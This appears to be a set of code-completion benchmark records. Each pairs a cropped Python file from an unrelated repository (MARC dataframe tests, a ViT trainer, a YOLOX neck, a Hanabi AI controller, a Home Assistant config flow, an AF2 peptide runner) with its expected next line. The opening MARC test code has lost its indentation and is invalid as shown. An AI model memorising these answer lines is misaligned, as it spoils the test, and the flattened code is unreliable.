# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
marc.get_field("abc")
def test_get_subfield() -> None:
assert marc.get_subfield("245", "a").label == "Title"
with raises(SchemaSubfieldError, match="- is not a valid subfield in field 245"):
marc.get_subfield("245", "-") is None
def test_non_repeatable_field() -> None:
f245 = marc.get_field("245")
assert f245.tag == "245"
assert f245.label == "Title Statement"
assert f245.repeatable is False
def test_repeatable_field() -> None:
f650 = marc.get_field("650")
assert f650.tag == "650"
assert f650.label == "Subject Added Entry-Topical Term"
assert f650.repeatable is True
def test_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"))
assert len(df.columns) == 215
assert len(df) == 10612
assert df.iloc[0]["F008"] == "000110s2000 ohu f m eng "
# 245 is not repeatable
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
# 650 is repeatable
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_fields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245", "650"])
assert len(df) == 10612
# should only have two columns in the dataframe
assert len(df.columns) == 2
assert df.columns[0] == "F245"
assert df.columns[1] == "F650"
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_subfields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245a", "260c"])
assert len(df) == 10612
assert len(df.columns) == 2
assert df.columns[0] == "F245a"
assert df.columns[1] == "F260c"
# 245a is not repeatable
assert df.iloc[0]["F245a"] == "Leak testing CD-ROM"
# 260c is repeatable
assert df.iloc[0]["F260c"] == ["c2000."]
def test_field_mapping() -> None:
m = _mapping(["245", "650"])
assert m["245"] is None
assert m["650"] is None
def test_field_subfield_mapping() -> None:
m = _mapping(["245a", "650ax", "260"])
assert set(m["245"]) == set(["a"])
assert set(m["650"]) == set(["a", "x"])
assert m["260"] is None
def test_batch() -> None:
dfs = dataframe_iter(open("test-data/utf8.marc", "rb"), batch=1000)
df = next(dfs)
assert type(df), pandas.DataFrame
assert len(df) == 1000
def test_to_csv() -> None:
to_csv(
open("test-data/utf8.marc", "rb"), open("test-data/utf8.csv", "w"), batch=1000
)
df = pandas.read_csv("test-data/utf8.csv")
assert len(df) == 10612
assert len(df.columns) == 215
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
def test_to_parquet() -> None: | to_parquet( | 8 | 2023-12-21 21:14:29+00:00 | 4k |
WangWenhao0716/ViT4ICD | Stage_23/dg/trainers_cos_ema_feat_tune.py | [
{
"identifier": "accuracy",
"path": "Stage_23/dg/evaluation_metrics/classification.py",
"snippet": "def accuracy(output, target, topk=(1,)):\n with torch.no_grad():\n output, target = to_torch(output), to_torch(target)\n maxk = max(topk)\n batch_size = target.size(0)\n\n _... | import time
import torch
import torch.nn as nn
import numpy as np
from torch.nn import functional as F
from .evaluation_metrics import accuracy
from .loss import CrossEntropyLabelSmooth#, CosfacePairwiseLoss
from .utils.meters import AverageMeter
from .layer import MarginCosineProduct | 2,228 | from __future__ import print_function, absolute_import
class Trainer(object):
def __init__(self, model, name_feature_support, num_classes, margin=0.0):
super(Trainer, self).__init__()
self.model = model
self.name_support = np.array(name_feature_support[0])
self.pos = np.argsort(self.name_support)
self.feat_support = name_feature_support[1]
self.criterion_ce = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
self.criterion_ce_1 = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
#self.criterion_support = nn.MSELoss().cuda()#nn.L1Loss().cuda() #nn.MSELoss().cuda()
#self.criterion_cos_pair = CosfacePairwiseLoss(m=0.35, s=64).cuda()
#self.criterion_triple = SoftTripletLoss(margin=margin).cuda()
#self.w_ce = 10
#self.w_tri = 1
#print("The weight for loss_ce is ", self.w_ce)
#print("The weight for loss_tri is ", self.w_tri)
def train(self, epoch, data_loader, data_loader_support, optimizer, ema, train_iters=200, print_freq=1):
self.model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_ce = AverageMeter()
losses_ce_1 = AverageMeter()
losses_sp = AverageMeter()
#losses_cos_pair = AverageMeter()
#losses_tr = AverageMeter()
precisions = AverageMeter()
precisions_1 = AverageMeter()
end = time.time()
for i in range(train_iters):
source_inputs = data_loader.next()
support_image, labels_support = data_loader_support.next()
support_features = torch.Tensor(self.feat_support[self.pos[labels_support]]).cuda()
data_time.update(time.time() - end)
s_inputs, targets = self._parse_data(source_inputs)
s_features, s_cls_out, s_cls_out_1 = self.model(s_inputs, targets)
ori_features, _, _ = self.model(support_image, targets)
# backward main #
loss_ce, loss_ce_1, prec, prec_1 = self._forward(s_features, s_cls_out, s_cls_out_1, targets)
ori_features = ori_features/torch.norm(ori_features, dim=1).view(ori_features.shape[0],1)
#support_features = support_features/torch.norm(support_features, dim=1).view(support_features.shape[0],1)
loss_sp = torch.mean(torch.sum((ori_features - support_features)**2, dim=1))
#loss_sp = torch.mean(torch.sum(torch.abs(ori_features - support_features), dim=1))
loss = loss_ce + loss_ce_1 + 100 * loss_sp
losses_ce.update(loss_ce.item())
losses_ce_1.update(loss_ce_1.item())
losses_sp.update(loss_sp.item())
precisions.update(prec)
precisions_1.update(prec_1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
ema.update()
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % print_freq == 0):
print('Epoch: [{}][{}/{}]\t'
'LR:{:.8f}\t'
'Time {:.3f} ({:.3f})\t'
'Data {:.3f} ({:.3f})\t'
'Loss_ce {:.3f} ({:.3f})\t'
'Loss_ce_1 {:.3f} ({:.3f})\t'
'Loss_sp {:.3f} ({:.3f})\t'
'Prec {:.2%} ({:.2%}) \t'
'Prec_1 {:.2%} ({:.2%}) \t'
.format(epoch, i + 1, train_iters,optimizer.param_groups[0]["lr"],
batch_time.val, batch_time.avg,
data_time.val, data_time.avg,
losses_ce.val, losses_ce.avg,
losses_ce_1.val, losses_ce_1.avg,
losses_sp.val, losses_sp.avg,
precisions.val, precisions.avg,
precisions_1.val, precisions_1.avg))
def _parse_data(self, inputs):
imgs, _, pids, _ = inputs
inputs = imgs.cuda()
targets = pids.cuda()
return inputs, targets
def _forward(self, s_features, s_outputs, s_outputs_1, targets):
s_features = s_features.cuda()
s_outputs = s_outputs.cuda()
s_outputs_1 = s_outputs_1.cuda()
targets = targets.cuda()
loss_ce = self.criterion_ce(s_outputs, targets)
loss_ce_1 = self.criterion_ce(s_outputs_1, targets)
| from __future__ import print_function, absolute_import
class Trainer(object):
def __init__(self, model, name_feature_support, num_classes, margin=0.0):
super(Trainer, self).__init__()
self.model = model
self.name_support = np.array(name_feature_support[0])
self.pos = np.argsort(self.name_support)
self.feat_support = name_feature_support[1]
self.criterion_ce = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
self.criterion_ce_1 = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
#self.criterion_support = nn.MSELoss().cuda()#nn.L1Loss().cuda() #nn.MSELoss().cuda()
#self.criterion_cos_pair = CosfacePairwiseLoss(m=0.35, s=64).cuda()
#self.criterion_triple = SoftTripletLoss(margin=margin).cuda()
#self.w_ce = 10
#self.w_tri = 1
#print("The weight for loss_ce is ", self.w_ce)
#print("The weight for loss_tri is ", self.w_tri)
def train(self, epoch, data_loader, data_loader_support, optimizer, ema, train_iters=200, print_freq=1):
self.model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_ce = AverageMeter()
losses_ce_1 = AverageMeter()
losses_sp = AverageMeter()
#losses_cos_pair = AverageMeter()
#losses_tr = AverageMeter()
precisions = AverageMeter()
precisions_1 = AverageMeter()
end = time.time()
for i in range(train_iters):
source_inputs = data_loader.next()
support_image, labels_support = data_loader_support.next()
support_features = torch.Tensor(self.feat_support[self.pos[labels_support]]).cuda()
data_time.update(time.time() - end)
s_inputs, targets = self._parse_data(source_inputs)
s_features, s_cls_out, s_cls_out_1 = self.model(s_inputs, targets)
ori_features, _, _ = self.model(support_image, targets)
# backward main #
loss_ce, loss_ce_1, prec, prec_1 = self._forward(s_features, s_cls_out, s_cls_out_1, targets)
ori_features = ori_features/torch.norm(ori_features, dim=1).view(ori_features.shape[0],1)
#support_features = support_features/torch.norm(support_features, dim=1).view(support_features.shape[0],1)
loss_sp = torch.mean(torch.sum((ori_features - support_features)**2, dim=1))
#loss_sp = torch.mean(torch.sum(torch.abs(ori_features - support_features), dim=1))
loss = loss_ce + loss_ce_1 + 100 * loss_sp
losses_ce.update(loss_ce.item())
losses_ce_1.update(loss_ce_1.item())
losses_sp.update(loss_sp.item())
precisions.update(prec)
precisions_1.update(prec_1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
ema.update()
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % print_freq == 0):
print('Epoch: [{}][{}/{}]\t'
'LR:{:.8f}\t'
'Time {:.3f} ({:.3f})\t'
'Data {:.3f} ({:.3f})\t'
'Loss_ce {:.3f} ({:.3f})\t'
'Loss_ce_1 {:.3f} ({:.3f})\t'
'Loss_sp {:.3f} ({:.3f})\t'
'Prec {:.2%} ({:.2%}) \t'
'Prec_1 {:.2%} ({:.2%}) \t'
.format(epoch, i + 1, train_iters,optimizer.param_groups[0]["lr"],
batch_time.val, batch_time.avg,
data_time.val, data_time.avg,
losses_ce.val, losses_ce.avg,
losses_ce_1.val, losses_ce_1.avg,
losses_sp.val, losses_sp.avg,
precisions.val, precisions.avg,
precisions_1.val, precisions_1.avg))
def _parse_data(self, inputs):
imgs, _, pids, _ = inputs
inputs = imgs.cuda()
targets = pids.cuda()
return inputs, targets
def _forward(self, s_features, s_outputs, s_outputs_1, targets):
s_features = s_features.cuda()
s_outputs = s_outputs.cuda()
s_outputs_1 = s_outputs_1.cuda()
targets = targets.cuda()
loss_ce = self.criterion_ce(s_outputs, targets)
loss_ce_1 = self.criterion_ce(s_outputs_1, targets)
| prec, = accuracy(s_outputs.data, targets.data) | 0 | 2023-12-17 11:32:48+00:00 | 4k |
alibaba/u2mot | yolox/models/yolo_pafpn.py | [
{
"identifier": "CSPDarknet",
"path": "yolox/models/darknet.py",
"snippet": "class CSPDarknet(nn.Module):\n def __init__(\n self,\n dep_mul,\n wid_mul,\n out_features=(\"dark3\", \"dark4\", \"dark5\"),\n depthwise=False,\n act=\"silu\",\n ):\n super... | import torch
import torch.nn as nn
from .darknet import CSPDarknet
from .network_blocks import BaseConv, CSPLayer, DWConv | 1,948 | #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOPAFPN(nn.Module):
"""
YOLOv3 model. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=1.0,
width=1.0,
in_features=("dark3", "dark4", "dark5"),
in_channels=[256, 512, 1024],
depthwise=False,
act="silu",
):
super().__init__()
| #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOPAFPN(nn.Module):
"""
YOLOv3 model. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=1.0,
width=1.0,
in_features=("dark3", "dark4", "dark5"),
in_channels=[256, 512, 1024],
depthwise=False,
act="silu",
):
super().__init__() | self.backbone = CSPDarknet(depth, width, depthwise=depthwise, act=act) | 0 | 2023-12-18 10:04:40+00:00 | 4k |
UnbSky/Hanabi-AI-Assitant | game_controller.py | [
{
"identifier": "load_model",
"path": "play_util.py",
"snippet": "def load_model(model_name=None):\n #device = 'cuda' if torch.cuda.is_available() else 'cpu' # examples: 'cpu', 'cuda', 'cuda:0', 'cuda:1', etc.\n device = 'cpu'\n\n acition_dict_toid = {}\n if model_name is None:\n dic... | from play_util import load_model, generate_answer
from dataclasses import dataclass
import random
import logging | 3,552 | # 游戏初始情况
if "6 Suits" in self.variant_name:
# 6张牌
self.Irank = [0, 0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5, 5]
index_amount = 6
self.special_dict.last_special_card = 5
self.total_card = 60
else:
# 5张牌
self.Irank = [0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5]
index_amount = 5
self.special_dict.last_special_card = 4
self.total_card = 50
for vstr in variant_one_card:
if vstr in self.variant_name:
self.last_one_card = True
self.total_card -= 5
break
for vstr in no_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_color_rule = True
break
for vstr in all_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_color_rule = True
break
for vstr in no_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_rank_rule = True
break
for vstr in all_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_rank_rule = True
break
for pid in range(self.players_count):
self.players.append(GamePlayer(pid, self))
def set_current_history(self, index):
history_dict = self.game_history[index]
self.Irank = history_dict["Irank"]
self.Hrank = history_dict["Hrank"]
self.score = sum(self.Irank)
for i in range(self.players_count):
self.players[i].cards = history_dict["cards"][i]
self.players[i].known_cards = history_dict["kcards"][i]
self.clue = history_dict["clue"]
self.active_pid = history_dict["active_pid"]
action_token = history_dict["action_token"]
action = self.get_action(action_token, self.active_pid)
return action
def get_current_card(self):
current_card = self.total_card - self.score - len(self.discard_cards) - self.players_count * self.players_card_count
if current_card <= 0:
return 0
return current_card
def add_card_deck(self, card):
self.all_cards.append(card)
def __init__(self, model_data=None):
if model_data is None:
self.model, self.action_dict_toact, self.action_dict_toid, self.output_action_dict_toact, self.output_action_dict_toid, self.device = load_model()
else:
self.model = model_data[0]
self.action_dict_toact = model_data[1]
self.action_dict_toid = model_data[2]
self.output_action_dict_toact = model_data[3]
self.output_action_dict_toid = model_data[4]
self.device = model_data[5]
def parse_card(self, card):
if card[1] == "_":
index = 9
else:
index = int(card[1])
if card[3] == "_":
rank = 9
else:
rank = int(card[3])
return index, rank
def update_AI_token(self, active_pid):
# 补充所有的玩家目前的手牌情况
light_cards = [[] for _ in range(self.players_count)]
# for iindex in range(len(self.Irank)):
# irank_str = f"irank-I{iindex}R{self.Irank[iindex]}"
# #print(irank_str)
# self.AItokens[active_pid].append(irank_str)
# self.AItokens[active_pid].append(f"score-{self.score}")
for pid in range(self.players_count):
rpid = pid - active_pid
if rpid < 0:
rpid += self.players_count
player = self.players[pid]
if rpid == 0:
light_cards[rpid] = player.get_light_card_myself()
else:
light_cards[rpid] = player.get_light_card(rpid)
for i in range(len(light_cards) - 1, -1, -1):
self.AItokens[active_pid].extend(light_cards[i])
self.AImasks[active_pid].extend([0] * len(light_cards[i]))
# 给AI们更新游戏状态token
self.AItokens[active_pid].append(self.op_token)
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"myturn-{self.AIturn[active_pid]}")
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"clues-{self.clue}")
self.AImasks[active_pid].append(0)
def call_AI_predict(self, active_pid, topk):
# AI行动(更新token)
self.update_AI_token(active_pid)
|
def get_logger(filename, verbosity=1, name=None):
level_dict = {0: logging.DEBUG, 1: logging.INFO, 2: logging.WARNING}
formatter = logging.Formatter(
"[%(asctime)s][%(filename)s][%(levelname)s] %(message)s"
)
logger = logging.getLogger(name)
logger.setLevel(level_dict[verbosity])
fh = logging.FileHandler(filename, "w")
fh.setFormatter(formatter)
logger.addHandler(fh)
# sh = logging.StreamHandler()
# sh.setFormatter(formatter)
# logger.addHandler(sh)
return logger
logger = get_logger('gameplay_log.log')
@dataclass
class GameArgs:
players: int = 2
players_card: int = 5
AIplayer: list = None
variant: str = "No Variant"
random_start: bool = True
start_card: list = None
allow_drawback: bool = False
@dataclass
class SpecialGameArgs:
no_color_rule: bool = False
all_color_rule: bool = False
no_rank_rule: bool = False
all_rank_rule: bool = False
last_special_card: int = 4
def try_start_game(gameargs: GameArgs):
return GameController(gameargs)
class GamePlayer():
def __init__(self, pid, game_controller):
self.cards = []
self.known_cards = []
self.online_order = []
self.pid = pid
self.game_controller = game_controller
def gain_card(self, card, order=None):
self.cards.append(card)
self.online_order.append(order)
self.known_cards.append("I_R_")
def get_light_card(self, rpid):
light_tokens = []
for i in range(len(self.cards)):
lcard = self.cards[i]
kcard = self.known_cards[i]
token = f"light-PR{rpid}-{lcard}-{kcard}"
light_tokens.append(token)
return light_tokens
def get_light_card_myself(self):
light_tokens = []
for i in range(len(self.cards)):
kcard = self.known_cards[i]
token = f"light_myself-{kcard}"
light_tokens.append(token)
return light_tokens
def get_card_at(self, index):
return self.cards[index], self.known_cards[index]
def remove_card_at(self, index):
self.cards.pop(index)
self.known_cards.pop(index)
self.online_order.pop(index)
def get_clue(self, clue, clue_type, clue_value):
# clue的格式是一个 I_ 或者 R_
for card_ind in range(len(self.cards)):
# print(clue_info, target_card[card_ind], (clue_info in target_card[card_ind]))
if clue in self.cards[card_ind]:
kcard = self.known_cards[card_ind]
if clue_type == 0:
self.known_cards[card_ind] = kcard[:1] + f"{clue_value}" + kcard[2:]
elif clue_type == 1:
self.known_cards[card_ind] = kcard[:3] + f"{clue_value}" + kcard[4:]
# I_R_ 表示牌,当表示自己的牌是未知的时候使用 IURU
class GameController():
def start_game(self, gameargs: GameArgs):
# if not gameargs.random_start:
# if gameargs.start_card is None:
# print("ERROR: 没有设置开始牌型")
# elif len(gameargs.start_card) != gameargs.players * gameargs.players_card:
# print("ERROR: 并非所有玩家都有初始牌型")
# elif gameargs.allow_drawback:
# print("ERROR: 非随机对局不允许撤回AI的操作")
# self.online_card_order = []
self.game_history = []
self.players_count = gameargs.players
self.players_card_count = gameargs.players_card
self.players = []
self.AIplayes = gameargs.AIplayer
self.AItokens = [[] for _ in range(self.players_count)]
self.AImasks = [[] for _ in range(self.players_count)]
self.AIturn = [1 for _ in range(self.players_count)]
self.draw_check_value = random.randint(2, 7)
# 目前默认所有玩法都是普通玩法
self.allow_drawback = gameargs.allow_drawback
# 是否是一把随机发牌的游戏(这说明只存在AI,并且整个游戏是完全自动的)
self.ramdom_start = gameargs.random_start
# 所有牌,发牌按照该顺序发牌
self.all_cards = []
self.discard_cards = []
# 目前发到的牌的index
self.current_card_index = 0
self.game_actions = []
self.action_list_cache = None
self.op_token = f"OP-{gameargs.variant}-P{self.players_count}"
self.turn = 0
self.clue = 8
self.score = 0
self.mistake = 0
self.active_pid = 0
# Irank是目前的花色的情况
self.remain_round = self.players_count
variant_one_card = ["Dark Null", "Dark Brown", "Cocoa Rainbow", "Gray", "Black", "Dark Rainbow", "Gray Pink",
"Dark Pink", "Dark Omni"]
no_color_rule_variant = ["Null", "White", "Light Pink", "Dark Null", "Gray", "Gray Pink"]
all_color_rule_variant = ["Muddy Rainbow", "Rainbow", "Omni", "Cocoa Rainbow", "Dark Rainbow", "Dark Omni"]
no_rank_rule_variant = ["Null", "Brown", "Muddy Rainbow", "Dark Null", "Dark Brown", "Cocoa Rainbow"]
all_rank_rule_variant = ["Light Pink", "Pink", "Omni", "Gray Pink", "Dark Pink", "Dark Omni"]
self.variant_name = gameargs.variant
self.last_one_card = False
self.special_dict = SpecialGameArgs()
# 游戏初始情况
if "6 Suits" in self.variant_name:
# 6张牌
self.Irank = [0, 0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5, 5]
index_amount = 6
self.special_dict.last_special_card = 5
self.total_card = 60
else:
# 5张牌
self.Irank = [0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5]
index_amount = 5
self.special_dict.last_special_card = 4
self.total_card = 50
for vstr in variant_one_card:
if vstr in self.variant_name:
self.last_one_card = True
self.total_card -= 5
break
for vstr in no_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_color_rule = True
break
for vstr in all_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_color_rule = True
break
for vstr in no_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_rank_rule = True
break
for vstr in all_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_rank_rule = True
break
for pid in range(self.players_count):
self.players.append(GamePlayer(pid, self))
def set_current_history(self, index):
history_dict = self.game_history[index]
self.Irank = history_dict["Irank"]
self.Hrank = history_dict["Hrank"]
self.score = sum(self.Irank)
for i in range(self.players_count):
self.players[i].cards = history_dict["cards"][i]
self.players[i].known_cards = history_dict["kcards"][i]
self.clue = history_dict["clue"]
self.active_pid = history_dict["active_pid"]
action_token = history_dict["action_token"]
action = self.get_action(action_token, self.active_pid)
return action
def get_current_card(self):
current_card = self.total_card - self.score - len(self.discard_cards) - self.players_count * self.players_card_count
if current_card <= 0:
return 0
return current_card
def add_card_deck(self, card):
self.all_cards.append(card)
def __init__(self, model_data=None):
if model_data is None:
self.model, self.action_dict_toact, self.action_dict_toid, self.output_action_dict_toact, self.output_action_dict_toid, self.device = load_model()
else:
self.model = model_data[0]
self.action_dict_toact = model_data[1]
self.action_dict_toid = model_data[2]
self.output_action_dict_toact = model_data[3]
self.output_action_dict_toid = model_data[4]
self.device = model_data[5]
def parse_card(self, card):
if card[1] == "_":
index = 9
else:
index = int(card[1])
if card[3] == "_":
rank = 9
else:
rank = int(card[3])
return index, rank
def update_AI_token(self, active_pid):
# 补充所有的玩家目前的手牌情况
light_cards = [[] for _ in range(self.players_count)]
# for iindex in range(len(self.Irank)):
# irank_str = f"irank-I{iindex}R{self.Irank[iindex]}"
# #print(irank_str)
# self.AItokens[active_pid].append(irank_str)
# self.AItokens[active_pid].append(f"score-{self.score}")
for pid in range(self.players_count):
rpid = pid - active_pid
if rpid < 0:
rpid += self.players_count
player = self.players[pid]
if rpid == 0:
light_cards[rpid] = player.get_light_card_myself()
else:
light_cards[rpid] = player.get_light_card(rpid)
for i in range(len(light_cards) - 1, -1, -1):
self.AItokens[active_pid].extend(light_cards[i])
self.AImasks[active_pid].extend([0] * len(light_cards[i]))
# 给AI们更新游戏状态token
self.AItokens[active_pid].append(self.op_token)
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"myturn-{self.AIturn[active_pid]}")
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"clues-{self.clue}")
self.AImasks[active_pid].append(0)
def call_AI_predict(self, active_pid, topk):
# AI行动(更新token)
self.update_AI_token(active_pid) | action_ids, action_probs = generate_answer(self.model, self.AItokens[active_pid], self.action_dict_toid, self.device, topk) | 1 | 2023-12-17 03:57:47+00:00 | 4k |
m-abr/FCPCodebase | scripts/utils/Get_Up.py | [
{
"identifier": "Base_Agent",
"path": "agent/Base_Agent.py",
"snippet": "class Base_Agent():\n all_agents = []\n\n def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True,\n enable_draw:bool=True, apply_play_mode... | from agent.Base_Agent import Base_Agent as Agent
from itertools import count
from scripts.commons.Script import Script
import numpy as np | 3,600 |
'''
Objective:
----------
Fall and get up
'''
class Get_Up():
|
'''
Objective:
----------
Fall and get up
'''
class Get_Up(): | def __init__(self, script:Script) -> None: | 1 | 2023-12-16 23:40:23+00:00 | 4k |
koenhendriks/ha-button-plus | custom_components/button_plus/config_flow.py | [
{
"identifier": "ApiClient",
"path": "custom_components/button_plus/button_plus_api/api_client.py",
"snippet": "class ApiClient:\n \"\"\" Client to talk to Button+ website \"\"\"\n\n def __init__(self, session, cookie=None) -> None:\n _LOGGER.debug(f\"DEBUG CONFIG {cookie}\")\n self.... | import ipaddress
import json
import logging
import traceback
import voluptuous as vol
from json import JSONDecodeError
from homeassistant import config_entries, exceptions
from homeassistant.const import CONF_IP_ADDRESS, CONF_EMAIL, CONF_PASSWORD, CONF_HOST
from homeassistant.helpers import aiohttp_client
from .button_plus_api.api_client import ApiClient
from .button_plus_api.local_api_client import LocalApiClient
from .button_plus_api.model import DeviceConfiguration, MqttBroker
from .button_plus_api.event_type import EventType
from homeassistant.helpers.network import get_url
from .const import DOMAIN # pylint:disable=unused-import | 2,917 | """Config flow for Hello World integration."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Button+."""
local_brokers = [
"core-mosquitto",
"127.0.0.1",
"localhost"
]
def __init__(self):
self.mqtt_entry = None
self.broker_endpoint = None
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
async def async_step_user(self, user_input=None):
"""Handle the initial Button+ setup, showing the 2 options and checking the MQTT integration."""
errors = {}
mqtt_entries = self.hass.config_entries.async_entries(domain="mqtt")
if len(mqtt_entries) < 1:
mqtt_url = f'{get_url(self.hass)}/config/integrations/integration/mqtt'
return self.async_abort(
reason="mqtt_not_enabled",
description_placeholders={
"mqtt_integration_link": mqtt_url
})
mqtt_entry = mqtt_entries[0]
broker = self.get_mqtt_endpoint(mqtt_entry.data.get("broker"))
broker_port = mqtt_entry.data.get("port")
broker_username = mqtt_entry.data.get("username", "(No authentication)")
self.mqtt_entry = mqtt_entry
if user_input is not None:
self.broker_endpoint = user_input.get("broker", broker)
return await self.async_step_choose_entry()
return self.async_show_form(
step_id="user",
data_schema=vol.Schema({
vol.Required("broker", default=broker): str
}),
errors=errors,
description_placeholders={
"mqtt_broker": broker,
"mqtt_broker_port": broker_port,
"mqtt_user": broker_username
}
)
async def async_step_choose_entry(self, user_input=None):
errors = {}
# if user_input is not None:
return self.async_show_menu(
step_id="choose_entry",
menu_options=["fetch_website", "manual"],
description_placeholders={}
)
async def async_step_manual(self, user_input=None):
""" Handle setting up button plus from manual IP."""
errors = {}
ip = None
if user_input is not None:
ip = user_input.get(CONF_IP_ADDRESS, None)
valid = self.validate_ip(ip)
if valid:
try:
_LOGGER.debug(f"Fetching button+ device at {ip}")
| """Config flow for Hello World integration."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Button+."""
local_brokers = [
"core-mosquitto",
"127.0.0.1",
"localhost"
]
def __init__(self):
self.mqtt_entry = None
self.broker_endpoint = None
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
async def async_step_user(self, user_input=None):
"""Handle the initial Button+ setup, showing the 2 options and checking the MQTT integration."""
errors = {}
mqtt_entries = self.hass.config_entries.async_entries(domain="mqtt")
if len(mqtt_entries) < 1:
mqtt_url = f'{get_url(self.hass)}/config/integrations/integration/mqtt'
return self.async_abort(
reason="mqtt_not_enabled",
description_placeholders={
"mqtt_integration_link": mqtt_url
})
mqtt_entry = mqtt_entries[0]
broker = self.get_mqtt_endpoint(mqtt_entry.data.get("broker"))
broker_port = mqtt_entry.data.get("port")
broker_username = mqtt_entry.data.get("username", "(No authentication)")
self.mqtt_entry = mqtt_entry
if user_input is not None:
self.broker_endpoint = user_input.get("broker", broker)
return await self.async_step_choose_entry()
return self.async_show_form(
step_id="user",
data_schema=vol.Schema({
vol.Required("broker", default=broker): str
}),
errors=errors,
description_placeholders={
"mqtt_broker": broker,
"mqtt_broker_port": broker_port,
"mqtt_user": broker_username
}
)
async def async_step_choose_entry(self, user_input=None):
errors = {}
# if user_input is not None:
return self.async_show_menu(
step_id="choose_entry",
menu_options=["fetch_website", "manual"],
description_placeholders={}
)
async def async_step_manual(self, user_input=None):
""" Handle setting up button plus from manual IP."""
errors = {}
ip = None
if user_input is not None:
ip = user_input.get(CONF_IP_ADDRESS, None)
valid = self.validate_ip(ip)
if valid:
try:
_LOGGER.debug(f"Fetching button+ device at {ip}") | api_client = LocalApiClient(ip, aiohttp_client.async_get_clientsession(self.hass)) | 1 | 2023-12-18 15:14:21+00:00 | 4k |
RosettaCommons/AF2_peptide_hallucination | run.py | [
{
"identifier": "select_positions",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\n '''\n Select mutable positions in the binder based on a specific method.\n Returns a dictionary of binder with associated array in... | import os
import sys
import numpy as np
import hydra
import copy
from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer
from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ
from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure
from submodules.oligomer_hallucination.modules.mutations import mutate
from util.util import select_positions
from util import util
from util.loss import compute_loss
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig | 1,786 |
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
